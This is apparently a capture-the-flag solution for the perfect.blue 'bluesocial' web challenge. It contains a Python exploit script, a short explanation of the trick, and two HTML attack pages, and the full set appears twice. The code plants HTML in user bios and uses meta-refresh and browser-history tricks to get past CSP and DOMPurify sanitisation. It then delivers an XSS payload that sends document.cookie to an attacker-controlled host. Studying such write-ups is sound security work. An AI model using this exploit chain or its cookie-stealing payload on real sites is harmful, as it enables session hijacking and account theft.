parrot409/doit.py

## doit.py
#!/usr/bin/env python3
import requests

target = 'http://bluesocial.chal.perfect.blue:25005'
s = requests.session()
s.post(f'{target}/login',data={'username':'home'})
s.post(f'{target}/user/update',data={'bio':"""
    <!DOCTYPE html>
    <html lang='en'>
    <head>
        <meta charset='UTF-8'>
        <meta name='viewport' content='width=device-width, initial-scale=1.0'>
        <title>Transient Social App</title>
    </head>
    <body style='font-family: Arial, sans-serif; margin: 0; padding: 20px;'>

    <nav style='background-color: #f2f2f2; padding: 10px; margin-bottom: 20px;'>
        <h1 style='margin: 0;'><a href='/' style='text-decoration: none; color: black;'>Transient Social App</a></h1>
        <div>
            <a href='/user/home'>Home</a> |
            <a href='/logout'>Logout</a>
        </div>
    </nav>


        <h2>Welcome to Transient Social App, p13372!</h2>
        <p><strong>Your bio:</strong> <span id='userBio'>Loading...</span></p>
        <h3>Update Your Bio</h3>
        <form id='updateBioForm'>
            <textarea id='bioInput' name='bio' placeholder='Enter your bio'></textarea><br>
            <button type='submit'>Update Bio</button>
        </form>
        <iframe id='dompurifyFrame' src='/user/p13371' style='display: none;'></iframe>
        <script src='/static/home.js'></script>
    </body>
    </html>
""".replace('\n','')})
s.post(f'{target}/login',data={'username':'p13371'})
s.post(f'{target}/user/update',data={'bio':"""
	<meta http-equiv='refresh' content='0; url=http://IP:4000/t2.html'>
""".strip()})

s.post(f'{target}/login',data={'username':'home'})
input('good: ')
s.get(f'{target}/logout')

## info.txt
It was a very fun challenge.
The trick:
- create user "home"
- `x = window.open(perfect.blue/user/home)` on attacker.com
- perfect.blue/user/home has an iframe that can only point to perfect.blue because of csp
- that iframe redirects ( with meta tag ) to attacker.com/bypass-purify
- redirect that webpage with `x.location = attacker.com/doesnt-matter`
- delete user home
- do `x.history.back()`
- now magically the /dompurify iframe points to attacker.com/bypass-purify and we can bypass sanitization

## t1.html
<form id=wow action="http://bluesocial.chal.perfect.blue:25005/login" method=POST >
<input name=username value=smh >
</form>
<script>
if(window.name){
wow.submit()
throw "A"
} else {
window.open("?",'d')
}
let target = 'http://bluesocial.chal.perfect.blue:25005'

let x = window.open(`${target}/user/home`)
setTimeout(_=>{
   x.location = '/xx'
},2000)
setTimeout(_=>fetch('?gogo'),3000)

function df(){
   window.open(`${target}/user/home`)
   setTimeout(_=>x.history.back(),1000)
}
setTimeout(df,6000)

## t2.html
<script>
window.addEventListener('message', function(event) {
    event.ports[0].postMessage(`<img src=1 onerror='fetch("http://IP:4000/?a="+document.cookie)' >`);

});
</script>
	#!/usr/bin/env python3
	import requests

	target = 'http://bluesocial.chal.perfect.blue:25005'
	s = requests.session()
	s.post(f'{target}/login',data={'username':'home'})
	s.post(f'{target}/user/update',data={'bio':"""
	<!DOCTYPE html>
	<html lang='en'>
	<head>
	<meta charset='UTF-8'>
	<meta name='viewport' content='width=device-width, initial-scale=1.0'>
	<title>Transient Social App</title>
	</head>
	<body style='font-family: Arial, sans-serif; margin: 0; padding: 20px;'>

	<nav style='background-color: #f2f2f2; padding: 10px; margin-bottom: 20px;'>
	<h1 style='margin: 0;'><a href='/' style='text-decoration: none; color: black;'>Transient Social App</a></h1>
	<div>
	<a href='/user/home'>Home</a> \|
	<a href='/logout'>Logout</a>
	</div>
	</nav>


	<h2>Welcome to Transient Social App, p13372!</h2>
	<p><strong>Your bio:</strong> <span id='userBio'>Loading...</span></p>
	<h3>Update Your Bio</h3>
	<form id='updateBioForm'>
	<textarea id='bioInput' name='bio' placeholder='Enter your bio'></textarea><br>
	<button type='submit'>Update Bio</button>
	</form>
	<iframe id='dompurifyFrame' src='/user/p13371' style='display: none;'></iframe>
	<script src='/static/home.js'></script>
	</body>
	</html>
	""".replace('\n','')})
	s.post(f'{target}/login',data={'username':'p13371'})
	s.post(f'{target}/user/update',data={'bio':"""
	<meta http-equiv='refresh' content='0; url=http://IP:4000/t2.html'>
	""".strip()})

	s.post(f'{target}/login',data={'username':'home'})
	input('good: ')
	s.get(f'{target}/logout')
	It was a very fun challenge.
	The trick:
	- create user "home"
	- `x = window.open(perfect.blue/user/home)` on attacker.com
	- perfect.blue/user/home has an iframe that can only point to perfect.blue because of csp
	- that iframe redirects ( with meta tag ) to attacker.com/bypass-purify
	- redirect that webpage with `x.location = attacker.com/doesnt-matter`
	- delete user home
	- do `x.history.back()`
	- now magically the /dompurify iframe points to attacker.com/bypass-purify and we can bypass sanitization
	<form id=wow action="http://bluesocial.chal.perfect.blue:25005/login" method=POST >
	<input name=username value=smh >
	</form>
	<script>
	if(window.name){
	wow.submit()
	throw "A"
	} else {
	window.open("?",'d')
	}
	let target = 'http://bluesocial.chal.perfect.blue:25005'

	let x = window.open(`${target}/user/home`)
	setTimeout(_=>{
	x.location = '/xx'
	},2000)
	setTimeout(_=>fetch('?gogo'),3000)

	function df(){
	window.open(`${target}/user/home`)
	setTimeout(_=>x.history.back(),1000)
	}
	setTimeout(df,6000)
	<script>
	window.addEventListener('message', function(event) {
	event.ports[0].postMessage(`<img src=1 onerror='fetch("http://IP:4000/?a="+document.cookie)' >`);

	});
	</script>